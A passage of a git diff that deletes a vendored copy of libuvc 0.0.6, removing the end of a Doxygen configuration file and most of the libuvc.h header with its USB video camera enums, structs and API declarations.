-# background. This is disabled by default, because dot on Windows does not seem
-# to support this out of the box.
-#
-# Warning: Depending on the platform used, enabling this option may lead to
-# badly anti-aliased labels on the edges of a graph (i.e. they become hard to
-# read).
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10) support
-# this, this feature is disabled by default.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES doxygen will generate a legend page
-# explaining the meaning of the various boxes and arrows in the dot generated
-# graphs.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES doxygen will remove the intermediate dot
-# files that are used to generate the various graphs.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc.h b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc.h
deleted file mode 100644
index fa0aea0..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc.h
+++ /dev/null
@@ -1,741 +0,0 @@
-#ifndef LIBUVC_H
-#define LIBUVC_H
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#include <stdio.h> // FILE
-#include <stdint.h>
-#include <sys/time.h>
-#include <libuvc/libuvc_config.h>
-
-struct libusb_context;
-struct libusb_device_handle;
-
-/** UVC error types, based on libusb errors
- * @ingroup diag
- */
-typedef enum uvc_error {
-  /** Success (no error) */
-  UVC_SUCCESS = 0,
-  /** Input/output error */
-  UVC_ERROR_IO = -1,
-  /** Invalid parameter */
-  UVC_ERROR_INVALID_PARAM = -2,
-  /** Access denied */
-  UVC_ERROR_ACCESS = -3,
-  /** No such device */
-  UVC_ERROR_NO_DEVICE = -4,
-  /** Entity not found */
-  UVC_ERROR_NOT_FOUND = -5,
-  /** Resource busy */
-  UVC_ERROR_BUSY = -6,
-  /** Operation timed out */
-  UVC_ERROR_TIMEOUT = -7,
-  /** Overflow */
-  UVC_ERROR_OVERFLOW = -8,
-  /** Pipe error */
-  UVC_ERROR_PIPE = -9,
-  /** System call interrupted */
-  UVC_ERROR_INTERRUPTED = -10,
-  /** Insufficient memory */
-  UVC_ERROR_NO_MEM = -11,
-  /** Operation not supported */
-  UVC_ERROR_NOT_SUPPORTED = -12,
-  /** Device is not UVC-compliant */
-  UVC_ERROR_INVALID_DEVICE = -50,
-  /** Mode not supported */
-  UVC_ERROR_INVALID_MODE = -51,
-  /** Resource has a callback (can't use polling and async) */
-  UVC_ERROR_CALLBACK_EXISTS = -52,
-  /** Undefined error */
-  UVC_ERROR_OTHER = -99
-} uvc_error_t;
-
-/** Color coding of stream, transport-independent
- * @ingroup streaming
- */
-enum uvc_frame_format {
-  UVC_FRAME_FORMAT_UNKNOWN = 0,
-  /** Any supported format */
-  UVC_FRAME_FORMAT_ANY = 0,
-  UVC_FRAME_FORMAT_UNCOMPRESSED,
-  UVC_FRAME_FORMAT_COMPRESSED,
-  /** YUYV/YUV2/YUV422: YUV encoding with one luminance value per pixel and
-   * one UV (chrominance) pair for every two pixels.
-   */
-  UVC_FRAME_FORMAT_YUYV,
-  UVC_FRAME_FORMAT_UYVY,
-  /** 24-bit RGB */
-  UVC_FRAME_FORMAT_RGB,
-  UVC_FRAME_FORMAT_BGR,
-  /** Motion-JPEG (or JPEG) encoded images */
-  UVC_FRAME_FORMAT_MJPEG,
-  /** Greyscale images */
-  UVC_FRAME_FORMAT_GRAY8,
-  UVC_FRAME_FORMAT_GRAY16,
-  /* Raw colour mosaic images */
-  UVC_FRAME_FORMAT_BY8,
-  UVC_FRAME_FORMAT_BA81,
-  UVC_FRAME_FORMAT_SGRBG8,
-  UVC_FRAME_FORMAT_SGBRG8,
-  UVC_FRAME_FORMAT_SRGGB8,
-  UVC_FRAME_FORMAT_SBGGR8,
-  /** Number of formats understood */
-  UVC_FRAME_FORMAT_COUNT,
-};
-
-/* UVC_COLOR_FORMAT_* have been replaced with UVC_FRAME_FORMAT_*. Please use
- * UVC_FRAME_FORMAT_* instead of using these. */
-#define UVC_COLOR_FORMAT_UNKNOWN UVC_FRAME_FORMAT_UNKNOWN
-#define UVC_COLOR_FORMAT_UNCOMPRESSED UVC_FRAME_FORMAT_UNCOMPRESSED
-#define UVC_COLOR_FORMAT_COMPRESSED UVC_FRAME_FORMAT_COMPRESSED
-#define UVC_COLOR_FORMAT_YUYV UVC_FRAME_FORMAT_YUYV
-#define UVC_COLOR_FORMAT_UYVY UVC_FRAME_FORMAT_UYVY
-#define UVC_COLOR_FORMAT_RGB UVC_FRAME_FORMAT_RGB
-#define UVC_COLOR_FORMAT_BGR UVC_FRAME_FORMAT_BGR
-#define UVC_COLOR_FORMAT_MJPEG UVC_FRAME_FORMAT_MJPEG
-#define UVC_COLOR_FORMAT_GRAY8 UVC_FRAME_FORMAT_GRAY8
-#define UVC_COLOR_FORMAT_GRAY16 UVC_FRAME_FORMAT_GRAY16
-
-/** VideoStreaming interface descriptor subtype (A.6) */
-enum uvc_vs_desc_subtype {
-  UVC_VS_UNDEFINED = 0x00,
-  UVC_VS_INPUT_HEADER = 0x01,
-  UVC_VS_OUTPUT_HEADER = 0x02,
-  UVC_VS_STILL_IMAGE_FRAME = 0x03,
-  UVC_VS_FORMAT_UNCOMPRESSED = 0x04,
-  UVC_VS_FRAME_UNCOMPRESSED = 0x05,
-  UVC_VS_FORMAT_MJPEG = 0x06,
-  UVC_VS_FRAME_MJPEG = 0x07,
-  UVC_VS_FORMAT_MPEG2TS = 0x0a,
-  UVC_VS_FORMAT_DV = 0x0c,
-  UVC_VS_COLORFORMAT = 0x0d,
-  UVC_VS_FORMAT_FRAME_BASED = 0x10,
-  UVC_VS_FRAME_FRAME_BASED = 0x11,
-  UVC_VS_FORMAT_STREAM_BASED = 0x12
-};
-
-struct uvc_format_desc;
-struct uvc_frame_desc;
-
-/** Frame descriptor
- *
- * A "frame" is a configuration of a streaming format
- * for a particular image size at one of possibly several
- * available frame rates.
- */
-typedef struct uvc_frame_desc {
-  struct uvc_format_desc *parent;
-  struct uvc_frame_desc *prev, *next;
-  /** Type of frame, such as JPEG frame or uncompressed frme */
-  enum uvc_vs_desc_subtype bDescriptorSubtype;
-  /** Index of the frame within the list of specs available for this format */
-  uint8_t bFrameIndex;
-  uint8_t bmCapabilities;
-  /** Image width */
-  uint16_t wWidth;
-  /** Image height */
-  uint16_t wHeight;
-  /** Bitrate of corresponding stream at minimal frame rate */
-  uint32_t dwMinBitRate;
-  /** Bitrate of corresponding stream at maximal frame rate */
-  uint32_t dwMaxBitRate;
-  /** Maximum number of bytes for a video frame */
-  uint32_t dwMaxVideoFrameBufferSize;
-  /** Default frame interval (in 100ns units) */
-  uint32_t dwDefaultFrameInterval;
-  /** Minimum frame interval for continuous mode (100ns units) */
-  uint32_t dwMinFrameInterval;
-  /** Maximum frame interval for continuous mode (100ns units) */
-  uint32_t dwMaxFrameInterval;
-  /** Granularity of frame interval range for continuous mode (100ns) */
-  uint32_t dwFrameIntervalStep;
-  /** Frame intervals */
-  uint8_t bFrameIntervalType;
-  /** number of bytes per line */
-  uint32_t dwBytesPerLine;
-  /** Available frame rates, zero-terminated (in 100ns units) */
-  uint32_t *intervals;
-} uvc_frame_desc_t;
-
-/** Format descriptor
- *
- * A "format" determines a stream's image type (e.g., raw YUYV or JPEG)
- * and includes many "frame" configurations.
- */
-typedef struct uvc_format_desc {
-  struct uvc_streaming_interface *parent;
-  struct uvc_format_desc *prev, *next;
-  /** Type of image stream, such as JPEG or uncompressed. */
-  enum uvc_vs_desc_subtype bDescriptorSubtype;
-  /** Identifier of this format within the VS interface's format list */
-  uint8_t bFormatIndex;
-  uint8_t bNumFrameDescriptors;
-  /** Format specifier */
-  union {
-    uint8_t guidFormat[16];
-    uint8_t fourccFormat[4];
-  };
-  /** Format-specific data */
-  union {
-    /** BPP for uncompressed stream */
-    uint8_t bBitsPerPixel;
-    /** Flags for JPEG stream */
-    uint8_t bmFlags;
-  };
-  /** Default {uvc_frame_desc} to choose given this format */
-  uint8_t bDefaultFrameIndex;
-  uint8_t bAspectRatioX;
-  uint8_t bAspectRatioY;
-  uint8_t bmInterlaceFlags;
-  uint8_t bCopyProtect;
-  uint8_t bVariableSize;
-  /** Available frame specifications for this format */
-  struct uvc_frame_desc *frame_descs;
-} uvc_format_desc_t;
-
-/** UVC request code (A.8) */
-enum uvc_req_code {
-  UVC_RC_UNDEFINED = 0x00,
-  UVC_SET_CUR = 0x01,
-  UVC_GET_CUR = 0x81,
-  UVC_GET_MIN = 0x82,
-  UVC_GET_MAX = 0x83,
-  UVC_GET_RES = 0x84,
-  UVC_GET_LEN = 0x85,
-  UVC_GET_INFO = 0x86,
-  UVC_GET_DEF = 0x87
-};
-
-enum uvc_device_power_mode {
-  UVC_VC_VIDEO_POWER_MODE_FULL = 0x000b,
-  UVC_VC_VIDEO_POWER_MODE_DEVICE_DEPENDENT = 0x001b,
-};
-
-/** Camera terminal control selector (A.9.4) */
-enum uvc_ct_ctrl_selector {
-  UVC_CT_CONTROL_UNDEFINED = 0x00,
-  UVC_CT_SCANNING_MODE_CONTROL = 0x01,
-  UVC_CT_AE_MODE_CONTROL = 0x02,
-  UVC_CT_AE_PRIORITY_CONTROL = 0x03,
-  UVC_CT_EXPOSURE_TIME_ABSOLUTE_CONTROL = 0x04,
-  UVC_CT_EXPOSURE_TIME_RELATIVE_CONTROL = 0x05,
-  UVC_CT_FOCUS_ABSOLUTE_CONTROL = 0x06,
-  UVC_CT_FOCUS_RELATIVE_CONTROL = 0x07,
-  UVC_CT_FOCUS_AUTO_CONTROL = 0x08,
-  UVC_CT_IRIS_ABSOLUTE_CONTROL = 0x09,
-  UVC_CT_IRIS_RELATIVE_CONTROL = 0x0a,
-  UVC_CT_ZOOM_ABSOLUTE_CONTROL = 0x0b,
-  UVC_CT_ZOOM_RELATIVE_CONTROL = 0x0c,
-  UVC_CT_PANTILT_ABSOLUTE_CONTROL = 0x0d,
-  UVC_CT_PANTILT_RELATIVE_CONTROL = 0x0e,
-  UVC_CT_ROLL_ABSOLUTE_CONTROL = 0x0f,
-  UVC_CT_ROLL_RELATIVE_CONTROL = 0x10,
-  UVC_CT_PRIVACY_CONTROL = 0x11,
-  UVC_CT_FOCUS_SIMPLE_CONTROL = 0x12,
-  UVC_CT_DIGITAL_WINDOW_CONTROL = 0x13,
-  UVC_CT_REGION_OF_INTEREST_CONTROL = 0x14
-};
-
-/** Processing unit control selector (A.9.5) */
-enum uvc_pu_ctrl_selector {
-  UVC_PU_CONTROL_UNDEFINED = 0x00,
-  UVC_PU_BACKLIGHT_COMPENSATION_CONTROL = 0x01,
-  UVC_PU_BRIGHTNESS_CONTROL = 0x02,
-  UVC_PU_CONTRAST_CONTROL = 0x03,
-  UVC_PU_GAIN_CONTROL = 0x04,
-  UVC_PU_POWER_LINE_FREQUENCY_CONTROL = 0x05,
-  UVC_PU_HUE_CONTROL = 0x06,
-  UVC_PU_SATURATION_CONTROL = 0x07,
-  UVC_PU_SHARPNESS_CONTROL = 0x08,
-  UVC_PU_GAMMA_CONTROL = 0x09,
-  UVC_PU_WHITE_BALANCE_TEMPERATURE_CONTROL = 0x0a,
-  UVC_PU_WHITE_BALANCE_TEMPERATURE_AUTO_CONTROL = 0x0b,
-  UVC_PU_WHITE_BALANCE_COMPONENT_CONTROL = 0x0c,
-  UVC_PU_WHITE_BALANCE_COMPONENT_AUTO_CONTROL = 0x0d,
-  UVC_PU_DIGITAL_MULTIPLIER_CONTROL = 0x0e,
-  UVC_PU_DIGITAL_MULTIPLIER_LIMIT_CONTROL = 0x0f,
-  UVC_PU_HUE_AUTO_CONTROL = 0x10,
-  UVC_PU_ANALOG_VIDEO_STANDARD_CONTROL = 0x11,
-  UVC_PU_ANALOG_LOCK_STATUS_CONTROL = 0x12,
-  UVC_PU_CONTRAST_AUTO_CONTROL = 0x13
-};
-
-/** USB terminal type (B.1) */
-enum uvc_term_type {
-  UVC_TT_VENDOR_SPECIFIC = 0x0100,
-  UVC_TT_STREAMING = 0x0101
-};
-
-/** Input terminal type (B.2) */
-enum uvc_it_type {
-  UVC_ITT_VENDOR_SPECIFIC = 0x0200,
-  UVC_ITT_CAMERA = 0x0201,
-  UVC_ITT_MEDIA_TRANSPORT_INPUT = 0x0202
-};
-
-/** Output terminal type (B.3) */
-enum uvc_ot_type {
-  UVC_OTT_VENDOR_SPECIFIC = 0x0300,
-  UVC_OTT_DISPLAY = 0x0301,
-  UVC_OTT_MEDIA_TRANSPORT_OUTPUT = 0x0302
-};
-
-/** External terminal type (B.4) */
-enum uvc_et_type {
-  UVC_EXTERNAL_VENDOR_SPECIFIC = 0x0400,
-  UVC_COMPOSITE_CONNECTOR = 0x0401,
-  UVC_SVIDEO_CONNECTOR = 0x0402,
-  UVC_COMPONENT_CONNECTOR = 0x0403
-};
-
-/** Context, equivalent to libusb's contexts.
- *
- * May either own a libusb context or use one that's already made.
- *
- * Always create these with uvc_get_context.
- */
-struct uvc_context;
-typedef struct uvc_context uvc_context_t;
-
-/** UVC device.
- *
- * Get this from uvc_get_device_list() or uvc_find_device().
- */
-struct uvc_device;
-typedef struct uvc_device uvc_device_t;
-
-/** Handle on an open UVC device.
- *
- * Get one of these from uvc_open(). Once you uvc_close()
- * it, it's no longer valid.
- */
-struct uvc_device_handle;
-typedef struct uvc_device_handle uvc_device_handle_t;
-
-/** Handle on an open UVC stream.
- *
- * Get one of these from uvc_stream_open*().
- * Once you uvc_stream_close() it, it will no longer be valid.
- */
-struct uvc_stream_handle;
-typedef struct uvc_stream_handle uvc_stream_handle_t;
-
-/** Representation of the interface that brings data into the UVC device */
-typedef struct uvc_input_terminal {
-  struct uvc_input_terminal *prev, *next;
-  /** Index of the terminal within the device */
-  uint8_t bTerminalID;
-  /** Type of terminal (e.g., camera) */
-  enum uvc_it_type wTerminalType;
-  uint16_t wObjectiveFocalLengthMin;
-  uint16_t wObjectiveFocalLengthMax;
-  uint16_t wOcularFocalLength;
-  /** Camera controls (meaning of bits given in {uvc_ct_ctrl_selector}) */
-  uint64_t bmControls;
-} uvc_input_terminal_t;
-
-typedef struct uvc_output_terminal {
-  struct uvc_output_terminal *prev, *next;
-  /** @todo */
-} uvc_output_terminal_t;
-
-/** Represents post-capture processing functions */
-typedef struct uvc_processing_unit {
-  struct uvc_processing_unit *prev, *next;
-  /** Index of the processing unit within the device */
-  uint8_t bUnitID;
-  /** Index of the terminal from which the device accepts images */
-  uint8_t bSourceID;
-  /** Processing controls (meaning of bits given in {uvc_pu_ctrl_selector}) */
-  uint64_t bmControls;
-} uvc_processing_unit_t;
-
-/** Represents selector unit to connect other units */
-typedef struct uvc_selector_unit {
-  struct uvc_selector_unit *prev, *next;
-  /** Index of the selector unit within the device */
-  uint8_t bUnitID;
-} uvc_selector_unit_t;
-
-/** Custom processing or camera-control functions */
-typedef struct uvc_extension_unit {
-  struct uvc_extension_unit *prev, *next;
-  /** Index of the extension unit within the device */
-  uint8_t bUnitID;
-  /** GUID identifying the extension unit */
-  uint8_t guidExtensionCode[16];
-  /** Bitmap of available controls (manufacturer-dependent) */
-  uint64_t bmControls;
-} uvc_extension_unit_t;
-
-enum uvc_status_class {
-  UVC_STATUS_CLASS_CONTROL = 0x10,
-  UVC_STATUS_CLASS_CONTROL_CAMERA = 0x11,
-  UVC_STATUS_CLASS_CONTROL_PROCESSING = 0x12,
-};
-
-enum uvc_status_attribute {
-  UVC_STATUS_ATTRIBUTE_VALUE_CHANGE = 0x00,
-  UVC_STATUS_ATTRIBUTE_INFO_CHANGE = 0x01,
-  UVC_STATUS_ATTRIBUTE_FAILURE_CHANGE = 0x02,
-  UVC_STATUS_ATTRIBUTE_UNKNOWN = 0xff
-};
-
-/** A callback function to accept status updates
- * @ingroup device
- */
-typedef void(uvc_status_callback_t)(enum uvc_status_class status_class,
-                                    int event,
-                                    int selector,
-                                    enum uvc_status_attribute status_attribute,
-                                    void *data, size_t data_len,
-                                    void *user_ptr);
-
-/** A callback function to accept button events
- * @ingroup device
- */
-typedef void(uvc_button_callback_t)(int button,
-                                    int state,
-                                    void *user_ptr);
-
-/** Structure representing a UVC device descriptor.
- *
- * (This isn't a standard structure.)
- */
-typedef struct uvc_device_descriptor {
-  /** Vendor ID */
-  uint16_t idVendor;
-  /** Product ID */
-  uint16_t idProduct;
-  /** UVC compliance level, e.g. 0x0100 (1.0), 0x0110 */
-  uint16_t bcdUVC;
-  /** Serial number (null if unavailable) */
-  const char *serialNumber;
-  /** Device-reported manufacturer name (or null) */
-  const char *manufacturer;
-  /** Device-reporter product name (or null) */
-  const char *product;
-} uvc_device_descriptor_t;
-
-/** An image frame received from the UVC device
- * @ingroup streaming
- */
-typedef struct uvc_frame {
-  /** Image data for this frame */
-  void *data;
-  /** Size of image data buffer */
-  size_t data_bytes;
-  /** Width of image in pixels */
-  uint32_t width;
-  /** Height of image in pixels */
-  uint32_t height;
-  /** Pixel data format */
-  enum uvc_frame_format frame_format;
-  /** Number of bytes per horizontal line (undefined for compressed format) */
-  size_t step;
-  /** Frame number (may skip, but is strictly monotonically increasing) */
-  uint32_t sequence;
-  /** Estimate of system time when the device started capturing the image */
-  struct timeval capture_time;
-  /** Handle on the device that produced the image.
-   * @warning You must not call any uvc_* functions during a callback. */
-  uvc_device_handle_t *source;
-  /** Is the data buffer owned by the library?
-   * If 1, the data buffer can be arbitrarily reallocated by frame conversion
-   * functions.
-   * If 0, the data buffer will not be reallocated or freed by the library.
-   * Set this field to zero if you are supplying the buffer.
-   */
-  uint8_t library_owns_data;
-} uvc_frame_t;
-
-/** A callback function to handle incoming assembled UVC frames
- * @ingroup streaming
- */
-typedef void(uvc_frame_callback_t)(struct uvc_frame *frame, void *user_ptr);
-
-/** Streaming mode, includes all information needed to select stream
- * @ingroup streaming
- */
-typedef struct uvc_stream_ctrl {
-  uint16_t bmHint;
-  uint8_t bFormatIndex;
-  uint8_t bFrameIndex;
-  uint32_t dwFrameInterval;
-  uint16_t wKeyFrameRate;
-  uint16_t wPFrameRate;
-  uint16_t wCompQuality;
-  uint16_t wCompWindowSize;
-  uint16_t wDelay;
-  uint32_t dwMaxVideoFrameSize;
-  uint32_t dwMaxPayloadTransferSize;
-  uint32_t dwClockFrequency;
-  uint8_t bmFramingInfo;
-  uint8_t bPreferredVersion;
-  uint8_t bMinVersion;
-  uint8_t bMaxVersion;
-  uint8_t bInterfaceNumber;
-} uvc_stream_ctrl_t;
-
-uvc_error_t uvc_init(uvc_context_t **ctx, struct libusb_context *usb_ctx);
-void uvc_exit(uvc_context_t *ctx);
-
-uvc_error_t uvc_get_device_list(
-    uvc_context_t *ctx,
-    uvc_device_t ***list);
-void uvc_free_device_list(uvc_device_t **list, uint8_t unref_devices);
-
-uvc_error_t uvc_get_device_descriptor(
-    uvc_device_t *dev,
-    uvc_device_descriptor_t **desc);
-void uvc_free_device_descriptor(
-    uvc_device_descriptor_t *desc);
-
-uint8_t uvc_get_bus_number(uvc_device_t *dev);
-uint8_t uvc_get_device_address(uvc_device_t *dev);
-
-uvc_error_t uvc_find_device(
-    uvc_context_t *ctx,
-    uvc_device_t **dev,
-    int vid, int pid, const char *sn);
-
-uvc_error_t uvc_find_devices(
-    uvc_context_t *ctx,
-    uvc_device_t ***devs,
-    int vid, int pid, const char *sn);
-
-uvc_error_t uvc_open(
-    uvc_device_t *dev,
-    uvc_device_handle_t **devh);
-void uvc_close(uvc_device_handle_t *devh);
-
-uvc_device_t *uvc_get_device(uvc_device_handle_t *devh);
-struct libusb_device_handle *uvc_get_libusb_handle(uvc_device_handle_t *devh);
-
-void uvc_ref_device(uvc_device_t *dev);
-void uvc_unref_device(uvc_device_t *dev);
-
-void uvc_set_status_callback(uvc_device_handle_t *devh,
-                             uvc_status_callback_t cb,
-                             void *user_ptr);
-
-void uvc_set_button_callback(uvc_device_handle_t *devh,
-                             uvc_button_callback_t cb,
-                             void *user_ptr);
-
-const uvc_input_terminal_t *uvc_get_camera_terminal(uvc_device_handle_t *devh);
-const uvc_input_terminal_t *uvc_get_input_terminals(uvc_device_handle_t *devh);
-const uvc_output_terminal_t *uvc_get_output_terminals(uvc_device_handle_t *devh);
-const uvc_selector_unit_t *uvc_get_selector_units(uvc_device_handle_t *devh);
-const uvc_processing_unit_t *uvc_get_processing_units(uvc_device_handle_t *devh);
-const uvc_extension_unit_t *uvc_get_extension_units(uvc_device_handle_t *devh);
-
-uvc_error_t uvc_get_stream_ctrl_format_size(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    enum uvc_frame_format format,
-    int width, int height,
-    int fps
-    );
-
-const uvc_format_desc_t *uvc_get_format_descs(uvc_device_handle_t* );
-
-uvc_error_t uvc_probe_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl);
-
-uvc_error_t uvc_start_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags);
-
-uvc_error_t uvc_start_iso_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr);
-
-void uvc_stop_streaming(uvc_device_handle_t *devh);
-
-uvc_error_t uvc_stream_open_ctrl(uvc_device_handle_t *devh, uvc_stream_handle_t **strmh, uvc_stream_ctrl_t *ctrl);
-uvc_error_t uvc_stream_ctrl(uvc_stream_handle_t *strmh, uvc_stream_ctrl_t *ctrl);
-uvc_error_t uvc_stream_start(uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags);
-uvc_error_t uvc_stream_start_iso(uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr);
-uvc_error_t uvc_stream_get_frame(
-    uvc_stream_handle_t *strmh,
-    uvc_frame_t **frame,
-    int32_t timeout_us
-);
-uvc_error_t uvc_stream_stop(uvc_stream_handle_t *strmh);
-void uvc_stream_close(uvc_stream_handle_t *strmh);
-
-int uvc_get_ctrl_len(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl);
-int uvc_get_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len, enum uvc_req_code req_code);
-int uvc_set_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len);
-
-uvc_error_t uvc_get_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode *mode, enum uvc_req_code req_code);
-uvc_error_t uvc_set_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode mode);
-
-/* AUTO-GENERATED control accessors! Update them with the output of `ctrl-gen.py decl`. */
-uvc_error_t uvc_get_scanning_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code);
-uvc_error_t uvc_set_scanning_mode(uvc_device_handle_t *devh, uint8_t mode);
-
-uvc_error_t uvc_get_ae_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code);
-uvc_error_t uvc_set_ae_mode(uvc_device_handle_t *devh, uint8_t mode);
-
-uvc_error_t uvc_get_ae_priority(uvc_device_handle_t *devh, uint8_t* priority, enum uvc_req_code req_code);
-uvc_error_t uvc_set_ae_priority(uvc_device_handle_t *devh, uint8_t priority);
-
-uvc_error_t uvc_get_exposure_abs(uvc_device_handle_t *devh, uint32_t* time, enum uvc_req_code req_code);
-uvc_error_t uvc_set_exposure_abs(uvc_device_handle_t *devh, uint32_t time);
-
-uvc_error_t uvc_get_exposure_rel(uvc_device_handle_t *devh, int8_t* step, enum uvc_req_code req_code);
-uvc_error_t uvc_set_exposure_rel(uvc_device_handle_t *devh, int8_t step);
-
-uvc_error_t uvc_get_focus_abs(uvc_device_handle_t *devh, uint16_t* focus, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_abs(uvc_device_handle_t *devh, uint16_t focus);
-
-uvc_error_t uvc_get_focus_rel(uvc_device_handle_t *devh, int8_t* focus_rel, uint8_t* speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_rel(uvc_device_handle_t *devh, int8_t focus_rel, uint8_t speed);
-
-uvc_error_t uvc_get_focus_simple_range(uvc_device_handle_t *devh, uint8_t* focus, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_simple_range(uvc_device_handle_t *devh, uint8_t focus);
-
-uvc_error_t uvc_get_focus_auto(uvc_device_handle_t *devh, uint8_t* state, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_auto(uvc_device_handle_t *devh, uint8_t state);
-
-uvc_error_t uvc_get_iris_abs(uvc_device_handle_t *devh, uint16_t* iris, enum uvc_req_code req_code);
-uvc_error_t uvc_set_iris_abs(uvc_device_handle_t *devh, uint16_t iris);
-
-uvc_error_t uvc_get_iris_rel(uvc_device_handle_t *devh, uint8_t* iris_rel, enum uvc_req_code req_code);
-uvc_error_t uvc_set_iris_rel(uvc_device_handle_t *devh, uint8_t iris_rel);
-
-uvc_error_t uvc_get_zoom_abs(uvc_device_handle_t *devh, uint16_t* focal_length, enum uvc_req_code req_code);
-uvc_error_t uvc_set_zoom_abs(uvc_device_handle_t *devh, uint16_t focal_length);
-
-uvc_error_t uvc_get_zoom_rel(uvc_device_handle_t *devh, int8_t* zoom_rel, uint8_t* digital_zoom, uint8_t* speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_zoom_rel(uvc_device_handle_t *devh, int8_t zoom_rel, uint8_t digital_zoom, uint8_t speed);
-
-uvc_error_t uvc_get_pantilt_abs(uvc_device_handle_t *devh, int32_t* pan, int32_t* tilt, enum uvc_req_code req_code);
-uvc_error_t uvc_set_pantilt_abs(uvc_device_handle_t *devh, int32_t pan, int32_t tilt);
-
-uvc_error_t uvc_get_pantilt_rel(uvc_device_handle_t *devh, int8_t* pan_rel, uint8_t* pan_speed, int8_t* tilt_rel, uint8_t* tilt_speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_pantilt_rel(uvc_device_handle_t *devh, int8_t pan_rel, uint8_t pan_speed, int8_t tilt_rel, uint8_t tilt_speed);
-
-uvc_error_t uvc_get_roll_abs(uvc_device_handle_t *devh, int16_t* roll, enum uvc_req_code req_code);
-uvc_error_t uvc_set_roll_abs(uvc_device_handle_t *devh, int16_t roll);
-
-uvc_error_t uvc_get_roll_rel(uvc_device_handle_t *devh, int8_t* roll_rel, uint8_t* speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_roll_rel(uvc_device_handle_t *devh, int8_t roll_rel, uint8_t speed);
-
-uvc_error_t uvc_get_privacy(uvc_device_handle_t *devh, uint8_t* privacy, enum uvc_req_code req_code);
-uvc_error_t uvc_set_privacy(uvc_device_handle_t *devh, uint8_t privacy);
-
-uvc_error_t uvc_get_digital_window(uvc_device_handle_t *devh, uint16_t* window_top, uint16_t* window_left, uint16_t* window_bottom, uint16_t* window_right, uint16_t* num_steps, uint16_t* num_steps_units, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_window(uvc_device_handle_t *devh, uint16_t window_top, uint16_t window_left, uint16_t window_bottom, uint16_t window_right, uint16_t num_steps, uint16_t num_steps_units);
-
-uvc_error_t uvc_get_digital_roi(uvc_device_handle_t *devh, uint16_t* roi_top, uint16_t* roi_left, uint16_t* roi_bottom, uint16_t* roi_right, uint16_t* auto_controls, enum uvc_req_code req_code);
-uvc_error_t uvc_set_digital_roi(uvc_device_handle_t *devh, uint16_t roi_top, uint16_t roi_left, uint16_t roi_bottom, uint16_t roi_right, uint16_t auto_controls);
-
-uvc_error_t uvc_get_backlight_compensation(uvc_device_handle_t *devh, uint16_t* backlight_compensation, enum uvc_req_code req_code);
-uvc_error_t uvc_set_backlight_compensation(uvc_device_handle_t *devh, uint16_t backlight_compensation);
-
-uvc_error_t uvc_get_brightness(uvc_device_handle_t *devh, int16_t* brightness, enum uvc_req_code req_code);
-uvc_error_t uvc_set_brightness(uvc_device_handle_t *devh, int16_t brightness);
-
-uvc_error_t uvc_get_contrast(uvc_device_handle_t *devh, uint16_t* contrast, enum uvc_req_code req_code);
-uvc_error_t uvc_set_contrast(uvc_device_handle_t *devh, uint16_t contrast);
-
-uvc_error_t uvc_get_contrast_auto(uvc_device_handle_t *devh, uint8_t* contrast_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_contrast_auto(uvc_device_handle_t *devh, uint8_t contrast_auto);
-
-uvc_error_t uvc_get_gain(uvc_device_handle_t *devh, uint16_t* gain, enum uvc_req_code req_code);
-uvc_error_t uvc_set_gain(uvc_device_handle_t *devh, uint16_t gain);
-
-uvc_error_t uvc_get_power_line_frequency(uvc_device_handle_t *devh, uint8_t* power_line_frequency, enum uvc_req_code req_code);
-uvc_error_t uvc_set_power_line_frequency(uvc_device_handle_t *devh, uint8_t power_line_frequency);
-
-uvc_error_t uvc_get_hue(uvc_device_handle_t *devh, int16_t* hue, enum uvc_req_code req_code);
-uvc_error_t uvc_set_hue(uvc_device_handle_t *devh, int16_t hue);
-
-uvc_error_t uvc_get_hue_auto(uvc_device_handle_t *devh, uint8_t* hue_auto, enum uvc_req_code req_code);
-uvc_error_t uvc_set_hue_auto(uvc_device_handle_t *devh, uint8_t hue_auto);
-
-uvc_error_t uvc_get_saturation(uvc_device_handle_t *devh, uint16_t* saturation, enum uvc_req_code req_code);
